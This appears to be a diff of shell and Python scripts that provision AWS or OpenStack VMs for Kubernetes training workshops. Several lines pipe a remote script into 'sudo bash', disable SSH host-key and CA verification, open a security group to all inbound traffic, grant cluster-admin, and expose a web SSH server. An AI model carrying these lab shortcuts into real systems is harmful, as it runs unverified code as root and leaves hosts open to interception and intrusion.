if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
pssh "
|
||||
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
|
||||
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
|
||||
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
|
||||
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
|
||||
sudo -u docker tee -a /home/docker/.bashrc <<EOF
|
||||
. /home/ubuntu/kube-ps1/kube-ps1.sh
|
||||
KUBE_PS1_PREFIX=""
|
||||
KUBE_PS1_SUFFIX=""
|
||||
KUBE_PS1_SYMBOL_ENABLE="false"
|
||||
KUBE_PS1_CTX_COLOR="green"
|
||||
KUBE_PS1_NS_COLOR="green"
|
||||
EOF"
|
||||
|
||||
# Install stern
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
|
||||
# Install helm
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/helm ]; then
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
|
||||
_cmd_kubereset() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo kubeadm reset --force"
|
||||
}
|
||||
|
||||
_cmd kubetest "Check that all nodes are reporting as Ready"
|
||||
_cmd_kubetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# There are way too many backslashes in the command below.
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
|
||||
_cmd_ids() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
info "Looking up by tag:"
|
||||
aws_get_instance_ids_by_tag $TAG
|
||||
|
||||
# Just in case we managed to create instances but weren't able to tag them
|
||||
info "Looking up by token:"
|
||||
aws_get_instance_ids_by_client_token $TAG
|
||||
}
|
||||
|
||||
_cmd list "List available groups for a given infrastructure"
|
||||
_cmd_list() {
|
||||
need_infra $1
|
||||
infra_list
|
||||
}
|
||||
|
||||
_cmd listall "List VMs running on all configured infrastructures"
|
||||
_cmd_listall() {
|
||||
for infra in infra/*; do
|
||||
case $infra in
|
||||
infra/example.*)
|
||||
;;
|
||||
*)
|
||||
info "Listing infrastructure $infra:"
|
||||
need_infra $infra
|
||||
infra_list
|
||||
;;
|
||||
esac
|
||||
done
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
_cmd_netfix () {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo ethtool -K ens3 gro off
|
||||
sudo tee /root/pinger.service <<EOF
|
||||
[Unit]
|
||||
Description=pinger
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/
|
||||
ExecStart=/bin/ping -w60 1.1
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /root/pinger.service
|
||||
sudo systemctl start pinger"
|
||||
}
|
||||
|
||||
_cmd opensg "Open the default security group to ALL ingress traffic"
|
||||
_cmd_opensg() {
|
||||
need_infra $1
|
||||
infra_opensg
|
||||
}
|
||||
|
||||
_cmd disableaddrchecks "Disable source/destination IP address checks"
|
||||
_cmd_disableaddrchecks() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
infra_disableaddrchecks
|
||||
}
|
||||
|
||||
_cmd pssh "Run an arbitrary command on all nodes"
|
||||
_cmd_pssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
shift
|
||||
|
||||
pssh "$@"
|
||||
}
|
||||
|
||||
_cmd pull_images "Pre-pull a bunch of Docker images"
|
||||
_cmd_pull_images() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pull_tag
|
||||
}
|
||||
|
||||
_cmd quotas "Check our infrastructure quotas (max instances)"
|
||||
_cmd_quotas() {
|
||||
need_infra $1
|
||||
infra_quotas
|
||||
}
|
||||
|
||||
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
|
||||
_cmd_retag() {
|
||||
OLDTAG=$1
|
||||
NEWTAG=$2
|
||||
TAG=$OLDTAG
|
||||
need_tag
|
||||
if [[ -z "$NEWTAG" ]]; then
|
||||
die "You must specify a new tag to apply."
|
||||
fi
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
case "$1" in
|
||||
--infra) INFRA=$2; shift 2;;
|
||||
--settings) SETTINGS=$2; shift 2;;
|
||||
--count) COUNT=$2; shift 2;;
|
||||
--tag) TAG=$2; shift 2;;
|
||||
*) die "Unrecognized parameter: $1."
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$INFRA" ]; then
|
||||
die "Please add --infra flag to specify which infrastructure file to use."
|
||||
fi
|
||||
if [ -z "$SETTINGS" ]; then
|
||||
die "Please add --settings flag to specify which settings file to use."
|
||||
fi
|
||||
if [ -z "$COUNT" ]; then
|
||||
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
warning "No --count option was specified. Using value from settings file ($COUNT)."
|
||||
fi
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
need_settings $SETTINGS
|
||||
need_infra $INFRA
|
||||
|
||||
if [ -z "$TAG" ]; then
|
||||
TAG=$(make_tag)
|
||||
fi
|
||||
mkdir -p tags/$TAG
|
||||
ln -s ../../$INFRA tags/$TAG/infra.sh
|
||||
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
|
||||
echo creating > tags/$TAG/status
|
||||
|
||||
infra_start $COUNT
|
||||
sep
|
||||
info "Successfully created $COUNT instances with tag $TAG"
|
||||
sep
|
||||
echo created > tags/$TAG/status
|
||||
|
||||
info "To deploy Docker on these instances, you can run:"
|
||||
info "$0 deploy $TAG"
|
||||
info "To terminate these instances, you can run:"
|
||||
info "$0 stop $TAG"
|
||||
}
|
||||
|
||||
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
|
||||
_cmd_stop() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
infra_stop
|
||||
echo stopped > tags/$TAG/status
|
||||
}
|
||||
|
||||
_cmd tags "List groups of VMs known locally"
|
||||
_cmd_tags() {
|
||||
(
|
||||
cd tags
|
||||
echo "[#] [Status] [Tag] [Infra]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
for tag in *; do
|
||||
if [ -f $tag/ips.txt ]; then
|
||||
count="$(wc -l < $tag/ips.txt)"
|
||||
else
|
||||
count="?"
|
||||
fi
|
||||
if [ -f $tag/status ]; then
|
||||
status="$(cat $tag/status)"
|
||||
else
|
||||
status="?"
|
||||
fi
|
||||
if [ -f $tag/infra.sh ]; then
|
||||
infra="$(basename $(readlink $tag/infra.sh))"
|
||||
else
|
||||
infra="?"
|
||||
fi
|
||||
echo "$count $status $tag $infra" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
done
|
||||
)
|
||||
}
|
||||
|
||||
_cmd test "Run tests (pre-flight checks) on a group of VMs"
|
||||
_cmd_test() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
test_tag
|
||||
}
|
||||
|
||||
_cmd helmprom "Install Helm and Prometheus"
|
||||
_cmd_helmprom() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
fi"
|
||||
}
|
||||
|
||||
# Sometimes, weave fails to come up on some nodes.
|
||||
# Symptom: the pods on a node are unreachable (they don't even ping).
|
||||
# Remedy: wipe out Weave state and delete weave pod on that node.
|
||||
# Specifically, identify the weave pod that is defective, then:
|
||||
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
|
||||
# kubectl -n kube-system delete pod weave-net-XXXXX
|
||||
_cmd weavetest "Check that weave seems properly setup"
|
||||
_cmd_weavetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
|
||||
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
|
||||
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
|
||||
}
|
||||
|
||||
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
|
||||
_cmd_webssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install python-tornado python-paramiko -y"
|
||||
pssh "
|
||||
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
|
||||
pssh "
|
||||
for KEYFILE in /etc/ssh/*.pub; do
|
||||
read a b c < \$KEYFILE; echo localhost \$a \$b
|
||||
done > webssh/known_hosts"
|
||||
pssh "cat >webssh.service <<EOF
|
||||
[Unit]
|
||||
Description=webssh
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/home/ubuntu/webssh
|
||||
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF"
|
||||
pssh "
|
||||
sudo systemctl enable \$PWD/webssh.service &&
|
||||
sudo systemctl start webssh.service"
|
||||
}
|
||||
|
||||
greet() {
    IAMUSER=$(aws iam get-user --query 'User.UserName')
    info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}

pull_tag() {
    # Pre-pull a bunch of images
    pssh --timeout 900 'for I in \
        debian:latest \
        ubuntu:latest \
        fedora:latest \
        centos:latest \
        elasticsearch:2 \
        postgres \
        redis \
        alpine \
        registry \
        nicolaka/netshoot \
        jpetazzo/trainingwheels \
        golang \
        training/namer \
        dockercoins/hasher \
        dockercoins/rng \
        dockercoins/webui \
        dockercoins/worker \
        logstash \
        prom/node-exporter \
        google/cadvisor \
        dockersamples/visualizer \
        nathanleclaire/redisonrails; do
        sudo -u docker docker pull $I
    done'

    info "Finished pulling images for $TAG."
}

tag_is_reachable() {
    pssh -t 5 true 2>&1 >/dev/null
}

test_tag() {
    ips_file=tags/$TAG/ips.txt
    info "Picking a random IP address in $ips_file to run tests."
    ip=$(shuf -n1 $ips_file)
    test_vm $ip
    info "Tests complete."
}

test_vm() {
    ip=$1
    info "Testing instance with IP address $ip."
    user=ubuntu
    errors=""

    for cmd in "hostname" \
        "whoami" \
        "hostname -i" \
        "ls -l /usr/local/bin/i_am_first_node" \
        "grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
        "cat /etc/hosts" \
        "hostnamectl status" \
        "docker version | grep Version -B1" \
        "docker-compose version" \
        "docker-machine version" \
        "docker images" \
        "docker ps" \
        "curl --silent localhost:55555" \
        "sudo ls -la /mnt/ | grep docker" \
        "env" \
        "ls -la /home/docker/.ssh"; do
        sep "$cmd"
        echo "$cmd" \
            | ssh -A -q \
                -o "UserKnownHostsFile /dev/null" \
                -o "StrictHostKeyChecking=no" \
                $user@$ip sudo -u docker -i \
            || {
                status=$?
                error "$cmd exit status: $status"
                errors="[$status] $cmd\n$errors"
            }
    done
    sep
    if [ -n "$errors" ]; then
        error "The following commands had non-zero exit codes:"
        printf "$errors"
    fi
    info "Test VM was $ip."
}

make_key_name() {
    SHORT_FINGERPRINT=$(ssh-add -l | grep RSA | head -n1 | cut -d " " -f 2 | tr -d : | cut -c 1-8)
    echo "${SHORT_FINGERPRINT}-${USER}"
}

sync_keys() {
    # Make sure that the output of "ssh-add -l" contains "RSA"
    ssh-add -l | grep -q RSA \
        || die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent and add your keys?"

    AWS_KEY_NAME=$(make_key_name)
    info "Syncing keys..."
    if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
        aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
            --public-key-material "$(ssh-add -L \
                | grep -i RSA \
                | head -n1 \
                | cut -d " " -f 1-2)" &>/dev/null

        if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
            die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
        else
            info "Imported new key $AWS_KEY_NAME."
        fi
    else
        info "Using existing key $AWS_KEY_NAME."
    fi
}

make_tag() {
    if [ -z "$USER" ]; then
        export USER=anonymous
    fi
    date +%Y-%m-%d-%H-%M-$USER
}

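For reference, a tag produced by make_tag is just a timestamp followed by the user name:

make_tag
# -> prints something like: 2019-06-12-09-41-jerome  (hypothetical date and user)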
prepare-vms/lib/docker-prompt (new executable file)
@@ -0,0 +1,21 @@
#!/bin/sh
case "$DOCKER_HOST" in
    *:3376)
        echo swarm
        ;;
    *:2376)
        echo $DOCKER_MACHINE_NAME
        ;;
    *:2375)
        echo $DOCKER_MACHINE_NAME
        ;;
    *:55555)
        echo $DOCKER_MACHINE_NAME
        ;;
    "")
        echo local
        ;;
    *)
        echo unknown
        ;;
esac
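This helper is meant to be embedded in a shell prompt (the postprep script further down wires it into the docker user's PS1). A minimal stand-alone test, assuming the script is on the PATH as docker-prompt:

DOCKER_HOST=tcp://node2:2376 docker-prompt   # prints $DOCKER_MACHINE_NAME (empty if unset)
DOCKER_HOST= docker-prompt                   # prints "local"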
prepare-vms/lib/find-ubuntu-ami.sh (new file)
@@ -0,0 +1,174 @@
# borrowed from https://gist.github.com/kirikaza/6627072
# The original script has been wrapped in a function that invokes a subshell.
# That way, it can be safely invoked as a function from other scripts.

find_ubuntu_ami() {
    (

    usage() {
        cat >&2 <<__
usage: find-ubuntu-ami.sh [ <filter>... ] [ <sorting> ] [ <options> ]
where:
  <filter> is a pair of key and substring to search:
    -r <region>
    -n <name>
    -v <version>
    -a <arch>
    -t <type>
    -d <date>
    -i <image>
    -k <kernel>
  <sorting> is one of:
    -R by region
    -N by name
    -V by version
    -A by arch
    -T by type
    -D by date
    -I by image
    -K by kernel
  <options> can be:
    -q just show AMI

protip for Docker orchestration workshop admins:
./find-ubuntu-ami.sh -t hvm:ebs -r \$AWS_REGION -v 15.10 -N
__
        exit 1
    }

    args=$(getopt hr:n:v:a:t:d:i:k:RNVATDIKq $*)
    if [ $? != 0 ]; then
        echo >&2
        usage
    fi

    region=
    name=
    version=
    arch=
    type=
    date=
    image=
    kernel=

    sort=date

    quiet=

    set -- $args
    for a; do
        case "$a" in
            -h) usage ;;
            -r)
                region=$2
                shift
                ;;
            -n)
                name=$2
                shift
                ;;
            -v)
                version=$2
                shift
                ;;
            -a)
                arch=$2
                shift
                ;;
            -t)
                type=$2
                shift
                ;;
            -d)
                date=$2
                shift
                ;;
            -i)
                image=$2
                shift
                ;;
            -k)
                kernel=$2
                shift
                ;;
            -R) sort=region ;;
            -N) sort=name ;;
            -V) sort=version ;;
            -A) sort=arch ;;
            -T) sort=type ;;
            -D) sort=date ;;
            -I) sort=image ;;
            -K) sort=kernel ;;
            -q) quiet=y ;;
            --)
                shift
                break
                ;;
            *) continue ;;
        esac
        shift
    done

    [ $# = 0 ] || usage

    # Strip newlines and fix the trailing comma in the releasesTable JSON.
    fix_json() {
        tr -d \\n | sed 's/,]}/]}/'
    }

    jq_query() {
        cat <<__
.aaData | map (
    {
        region: .[0],
        name: .[1],
        version: .[2],
        arch: .[3],
        type: .[4],
        date: .[5],
        image: .[6],
        kernel: .[7]
    } | select (
        (.region | contains("$region")) and
        (.name | contains("$name")) and
        (.version | contains("$version")) and
        (.arch | contains("$arch")) and
        (.type | contains("$type")) and
        (.date | contains("$date")) and
        (.image | contains("$image</a>")) and
        (.kernel | contains("$kernel"))
    )
) | sort_by(.$sort) | .[] |
"\(.region)|\(.name)|\(.version)|\(.arch)|\(.type)|\(.date)|\(.image)|\(.kernel)"
__
    }

    trim_quotes() {
        sed 's/^"//;s/"$//'
    }

    escape_spaces() {
        sed 's/ /\\\ /g'
    }

    url=http://cloud-images.ubuntu.com/locator/ec2/releasesTable

    {
        [ "$quiet" ] || echo REGION NAME VERSION ARCH TYPE DATE IMAGE KERNEL
        curl -s $url | fix_json | jq "$(jq_query)" | trim_quotes | escape_spaces | tr \| ' '
    } \
        | while read region name version arch type date image kernel; do
            image=${image%<*}
            image=${image#*>}
            if [ "$quiet" ]; then
                echo $image
            else
                echo "$region|$name|$version|$arch|$type|$date|$image|$kernel"
            fi
        done | column -t -s \|

    )
}
prepare-vms/lib/infra.sh (new file)
@@ -0,0 +1,30 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.

infra_list() {
    warning "infra_list is unsupported on $INFRACLASS."
}

infra_quotas() {
    warning "infra_quotas is unsupported on $INFRACLASS."
}

infra_start() {
    warning "infra_start is unsupported on $INFRACLASS."
}

infra_stop() {
    warning "infra_stop is unsupported on $INFRACLASS."
}

infra_opensg() {
    warning "infra_opensg is unsupported on $INFRACLASS."
}

infra_disableaddrchecks() {
    warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}
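To illustrate the override mechanism, here is a sketch (the loading sequence is assumed, not shown in this diff): sourcing a concrete library after the stubs replaces each function with a real implementation.

# Sketch: load the stubs first, then a concrete infrastructure library.
INFRACLASS=aws
source lib/infra.sh
source lib/infra/$INFRACLASS.sh   # infra_start, infra_stop, ... now point to the AWS versions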
prepare-vms/lib/infra/aws.sh (new file)
@@ -0,0 +1,216 @@
infra_list() {
    aws_display_tags
}

infra_quotas() {
    greet

    max_instances=$(aws ec2 describe-account-attributes \
        --attribute-names max-instances \
        --query 'AccountAttributes[*][AttributeValues]')
    info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."

    # Print the list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION).
    # If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
    # Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
    info "Available regions:"
    aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}

infra_start() {
    COUNT=$1

    # Print our AWS username, to ease the pain of credential juggling
    greet

    # Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
    key_name=$(sync_keys)

    AMI=$(aws_get_ami) # Retrieve the AWS image ID
    if [ -z "$AMI" ]; then
        die "I could not find which AMI to use in this region. Try another region?"
    fi
    AWS_KEY_NAME=$(make_key_name)
    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

    sep "Starting instances"
    info "          Count: $COUNT"
    info "         Region: $AWS_DEFAULT_REGION"
    info "      Token/tag: $TAG"
    info "            AMI: $AMI"
    info "       Key name: $AWS_KEY_NAME"
    info "  Instance type: $AWS_INSTANCE_TYPE"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
        --instance-type $AWS_INSTANCE_TYPE \
        --client-token $TAG \
        --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
        --image-id $AMI)
    reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
    info "Reservation ID: $reservation_id"
    sep

    # If instance creation succeeded, we should have some IDs
    IDS=$(aws_get_instance_ids_by_client_token $TAG)
    if [ -z "$IDS" ]; then
        die "Instance creation failed."
    fi

    # Tag these new instances with a tag that is the same as the token
    aws_tag_instances $TAG $TAG

    # Wait until the EC2 API tells us that the instances are running
    wait_until_tag_is_running $TAG $COUNT

    aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}

infra_stop() {
    aws_kill_instances_by_tag
}

infra_opensg() {
    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol icmp \
        --port -1 \
        --cidr 0.0.0.0/0

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol udp \
        --port 0-65535 \
        --cidr 0.0.0.0/0

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol tcp \
        --port 0-65535 \
        --cidr 0.0.0.0/0
}

infra_disableaddrchecks() {
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    for ID in $IDS; do
        info "Disabling source/destination IP checks on: $ID"
        aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
    done
}

wait_until_tag_is_running() {
    TAG=$1
    COUNT=$2
    max_retry=100
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
        let "i += 1"
        info "$(printf "%d/%d instances online" $done_count $COUNT)"
        done_count=$(aws ec2 describe-instances \
            --filters "Name=tag:Name,Values=$TAG" \
            "Name=instance-state-name,Values=running" \
            --query "length(Reservations[].Instances[])")
        if [[ $i -gt $max_retry ]]; then
            die "Timed out while waiting for instance creation (after $max_retry retries)."
        fi
        sleep 1
    done
}

aws_display_tags() {
    # Print all "Name" tags in our region, with their instance count
    echo "[#] [Status] [Token] [Tag]" \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    aws ec2 describe-instances \
        --query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
        | tr -d "\r" \
        | uniq -c \
        | sort -k 3 \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}

aws_get_tokens() {
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].[ClientToken]' \
        | sort -u
}

aws_display_instance_statuses_by_tag() {
    IDS=$(aws ec2 describe-instances \
        --filters "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')

    aws ec2 describe-instance-status \
        --instance-ids $IDS \
        --query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
        --output table
}

aws_display_instances_by_tag() {
    result=$(aws ec2 describe-instances --output table \
        --filter "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].[ \
            InstanceId, \
            State.Name, \
            Tags[0].Value, \
            PublicIpAddress, \
            InstanceType \
            ]"
    )
    if [[ -z $result ]]; then
        die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
    else
        echo "$result"
    fi
}

aws_get_instance_ids_by_filter() {
    FILTER=$1
    aws ec2 describe-instances --filters $FILTER \
        --query Reservations[*].Instances[*].InstanceId \
        --output text | tr "\t" "\n" | tr -d "\r"
}

aws_get_instance_ids_by_client_token() {
    TOKEN=$1
    aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}

aws_get_instance_ids_by_tag() {
    aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}

aws_get_instance_ips_by_tag() {
    aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
        --output text \
        --query "Reservations[*].Instances[*].PublicIpAddress" \
        | tr "\t" "\n" \
        | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}

aws_kill_instances_by_tag() {
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    if [ -z "$IDS" ]; then
        die "Invalid tag."
    fi

    info "Deleting instances with tag $TAG."

    aws ec2 terminate-instances --instance-ids $IDS \
        | grep ^TERMINATINGINSTANCES

    info "Deleted instances with tag $TAG."
}

aws_tag_instances() {
    OLD_TAG_OR_TOKEN=$1
    NEW_TAG=$2
    IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
    IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

aws_get_ami() {
    ##VERSION##
    find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}
prepare-vms/lib/infra/generic.sh (new file)
@@ -0,0 +1,8 @@
infra_start() {
    COUNT=$1
    info "You should now run your provisioning commands for $COUNT machines."
    info "Note: no machines have been automatically created!"
    info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
    info "(one IP address per line, without any comments or extra lines)."
    touch tags/$TAG/ips.txt
}
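For instance, after provisioning three machines by hand, the file could be filled like this (a sketch; the tag and addresses are hypothetical):

# Hypothetical example: three manually provisioned VMs
TAG=2019-06-12-09-41-manual
printf '%s\n' 203.0.113.10 203.0.113.11 203.0.113.12 > tags/$TAG/ips.txt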
prepare-vms/lib/infra/openstack.sh (new file)
@@ -0,0 +1,20 @@
infra_start() {
    COUNT=$1

    cp terraform/*.tf tags/$TAG
    (
        cd tags/$TAG
        terraform init
        echo prefix = \"$TAG\" >> terraform.tfvars
        echo count = \"$COUNT\" >> terraform.tfvars
        terraform apply -auto-approve
        terraform output ip_addresses > ips.txt
    )
}

infra_stop() {
    (
        cd tags/$TAG
        terraform destroy -auto-approve
    )
}
prepare-vms/lib/ips-txt-to-html.py (new executable file)
@@ -0,0 +1,57 @@
#!/usr/bin/env python3
import os
import sys
import yaml
import jinja2

def prettify(l):
    l = [ip.strip() for ip in l]
    return ["node{}: <code>{}</code>".format(i+1, s) for (i, s) in enumerate(l)]

# Read settings from the user-provided settings file
SETTINGS = yaml.safe_load(open(sys.argv[1]))

clustersize = SETTINGS["clustersize"]

ips = list(open("ips.txt"))

print("---------------------------------------------")
print(" Number of IPs: {}".format(len(ips)))
print(" VMs per cluster: {}".format(clustersize))
print("---------------------------------------------")

# The number of IPs must be a multiple of the cluster size.
assert len(ips) % clustersize == 0

# Carve the flat list of IPs into consecutive chunks of "clustersize" addresses.
clusters = []

while ips:
    cluster = ips[:clustersize]
    ips = ips[clustersize:]
    clusters.append(cluster)

template_file_name = SETTINGS["cards_template"]
template_file_path = os.path.join(
    os.path.dirname(__file__),
    "..",
    "templates",
    template_file_name
)
template = jinja2.Template(open(template_file_path).read())
with open("ips.html", "w") as f:
    f.write(template.render(clusters=clusters, **SETTINGS))
